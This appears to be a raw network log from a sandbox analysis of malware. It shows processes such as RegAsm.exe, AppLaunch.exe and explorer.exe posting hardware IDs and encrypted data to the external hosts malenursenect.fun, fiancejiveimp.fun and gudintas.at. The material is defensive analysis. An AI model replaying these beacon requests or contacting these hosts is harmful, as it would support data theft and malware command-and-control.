                                                                    Set-Cookie: PHPSESSID=jh86kq25p2fbg9a0nc5gpi4ihn; expires=Sat, 27 Jan 2024 01:42:12 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:33 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7tAP2uPgKBaHbxXoZyDJ%2BIS%2FVxvVfAD5IqHTkrVJCEX94w%2Fn0airB%2B7AACTfInXlwPphALMLRi2GitPAsn0v0f1usuTyM5KErapbAxHDUW674adpSZR3f8EA5q6rkfBH3dTWzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039f9ebe788232-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:33.862257004 CEST6551INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    67192.168.2.349903104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:33.888961077 CEST6551OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:33.889365911 CEST6552OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:34.999891043 CEST6565INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=2vs80b6u9ucliug22j06si2don; expires=Sat, 27 Jan 2024 01:42:13 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:34 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QipV90GGvknb%2BNSPI%2FNI91K620sIIIj4%2FVI5CiYuQvXeGx04Kgb1dSaRKHZXKe6hfsxF7udpp2UR4gwMUSzf7YF6D74421O2Uuz4RlkTBWc0tWjhQMA9OinTvMr8zzHM8XcATw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039fa10d21391a-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:34.999914885 CEST6565INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    68192.168.2.349904172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:34.096066952 CEST6552OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:34.096421957 CEST6553OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:34.414865971 CEST6555INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=cj1e9v0ecod9sf9hv150r83nv0; expires=Sat, 27 Jan 2024 01:42:13 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:34 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=npfApuoLDd6CtWFW6fLOMESypQ8mV2TWIz0XpbIuE4jEz03GTWS7K0yGt%2BTr3W5YoOff36Dpkzu9NAaaZWBXpol9L4yzmNAot6Vvi3HQHE4qlqk8nGPEwOTIHuWhCXm0EWokvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039fa258b8826f-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:34.414895058 CEST6555INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    69192.168.2.349906172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:34.646718979 CEST6561OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:34.647119999 CEST6562OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:34.972995996 CEST6564INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=nui9rl6dtbpjbmj9vv96rm8d2c; expires=Sat, 27 Jan 2024 01:42:13 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:34 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l%2FmbQpi%2F%2B3nQPGwqf%2B5pSCd3ZhxJ%2FBUhXxV49dX9ffm3R1hSYAjsU8VsktDQo6vMkcJKSnPii3L4BdlrDWHZpbAT%2Bq6GSy4EvOrBIKxZur4nNw8P42v3TGAhIMrT14PQewaTqA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039fa5cb4e8226-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:34.973027945 CEST6564INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    7192.168.2.349810186.182.55.4480C:\Windows\explorer.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:54:30.331373930 CEST1548OUTPOST /tmp/ HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Accept: */*
                                                                    Referer: http://ptxqbvvyee.com/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                    Content-Length: 197
                                                                    Host: gudintas.at
                                                                    Oct 3, 2023 09:54:30.331373930 CEST1549OUTData Raw: 3b 6e 52 62 f2 c2 1e 26 d6 db c6 07 04 74 0b cc 0c 03 c0 96 1a 05 92 64 0e 75 72 e2 30 c6 b1 6e 9b 2b c3 5d 01 6a 51 69 e9 9d 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 6c 31 b8 ab
                                                                    Data Ascii: ;nRb&tdur0n+]jQi?*$`7C[zqNA -[k,vul1@C"Qe:0$-pKVaC|(V5+9GkaY],0P82?:)jdzEl
                                                                    Oct 3, 2023 09:54:31.266067982 CEST1549INHTTP/1.0 404 Not Found
                                                                    Date: Tue, 03 Oct 2023 07:54:30 GMT
                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                    X-Powered-By: PHP/7.4.15
                                                                    Content-Length: 331
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    70192.168.2.349907104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:35.187988043 CEST6566OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:35.188502073 CEST6567OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:35.514544010 CEST6569INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=9oed8t2dhfj1t7gisuen6a3dj6; expires=Sat, 27 Jan 2024 01:42:14 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:35 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YIM%2BPrSfWD6Chwf4eGG%2BKuvYasOr79MzJiJhSbIZsL2Ds96bWv72RtIwiM97WadBbdker1DrKwFhMlbYWGG7hpcaK8SLkPXrIIrRBh2XmO5EnKufNVkC53KZjpbAR%2BDaRNrUtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039fa92ef207df-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:35.514666080 CEST6569INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    71192.168.2.349908104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:35.251135111 CEST6567OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:35.251636028 CEST6568OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:37.255652905 CEST6574INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=7070e3m330pjrvepp827dqrdsr; expires=Sat, 27 Jan 2024 01:42:15 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:36 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AikWZmJJZspL0Oxil3WozdD2WtA5QONLltQCXptOtabb4XhXw0hQb0djE1JIEmU4GGcsMSNPJZ257arrIOmuvCzn1tZFKsz9rCqCOEBgiXxbzZPgKSxgnsTnDyQLZze%2BPKjLqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039fa9991f2896-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:37.255717993 CEST6574INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    72192.168.2.349909104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:35.739805937 CEST6570OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:35.740236998 CEST6570OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:35.975625992 CEST6572INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=fo763cnenqirad3i5nfmmf2n9i; expires=Sat, 27 Jan 2024 01:42:14 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:35 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q7aaQk2xlBHKmqq0WKcBXqOaaJ6idXXbwlMmjHmvX6joyhSnQ2TD0XbWkrxcoWfGZR0gZJbmuHLuueWufeZqUNnM8197OX0%2B73CSFP24kk4iOohU8OLqWE5KtQ%2BYOx8JyuPYZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039fac9fc339a0-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:35.975692034 CEST6572INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    73192.168.2.349910104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:36.224134922 CEST6572OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 534
                                                                    Host: fiancejiveimp.fun
                                                                    Oct 3, 2023 09:55:36.224456072 CEST6573OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:38.883364916 CEST6577INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=lo6lvmcoi6ltb044tj14plj925; expires=Sat, 27 Jan 2024 01:42:17 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:38 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ai3N1NAR70%2B3ALvtL2F17xijzFvmK1OrJWKPuBBnqamYuWq6lEmkMxlIsi953OF6FAn95A8jVAStd8t0tOB%2F7iyqOyV%2BuoL4wDbD27YZmSxuIM%2FBS%2BvNXt7HOX7kEKmUBfFWgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 81039faf9c64396e-IAD
                                                                    Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                    Data Ascii: 2ok
                                                                    Oct 3, 2023 09:55:38.883426905 CEST6577INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    74192.168.2.349911104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Oct 3, 2023 09:55:37.688587904 CEST6575OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                    User-Agent: TeslaBrowser/5.5
                                                                    Content-Length: 541
                                                                    Host: malenursenect.fun
                                                                    Oct 3, 2023 09:55:37.689044952 CEST6575OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"94F54833719A8886115329378BD39393A3A15022--SqDe87817huf871793q74Content-Disposition
                                                                    Oct 3, 2023 09:55:41.106264114 CEST6581INHTTP/1.1 200 OK
                                                                    Date: Tue, 03 Oct 2023 07:55:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    X-Powered-By: PHP/8.2.7
                                                                    Set-Cookie: PHPSESSID=mmkn34rhimfi26b7lkb5lqgsj8; expires=Sat, 27 Jan 2024 01:42:19 GMT; Max-Age=9999999; path=/
                                                                    Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 07:55:40 GMT; Max-Age=5184000; path=/
                                                                    Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KuSGe5zodbsKjiSOe8xwcwOZrw3hYGUXhrj8J5TQXv75B6RCw2WvVsxpz7b4RqN%2BHe6a1roKw%2Fdlqjojim8lSrCBZ4UTiCjKZH11Gqa%2BoXNbC4E5XrumVBgcLENox%2B%2FDLaNJzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
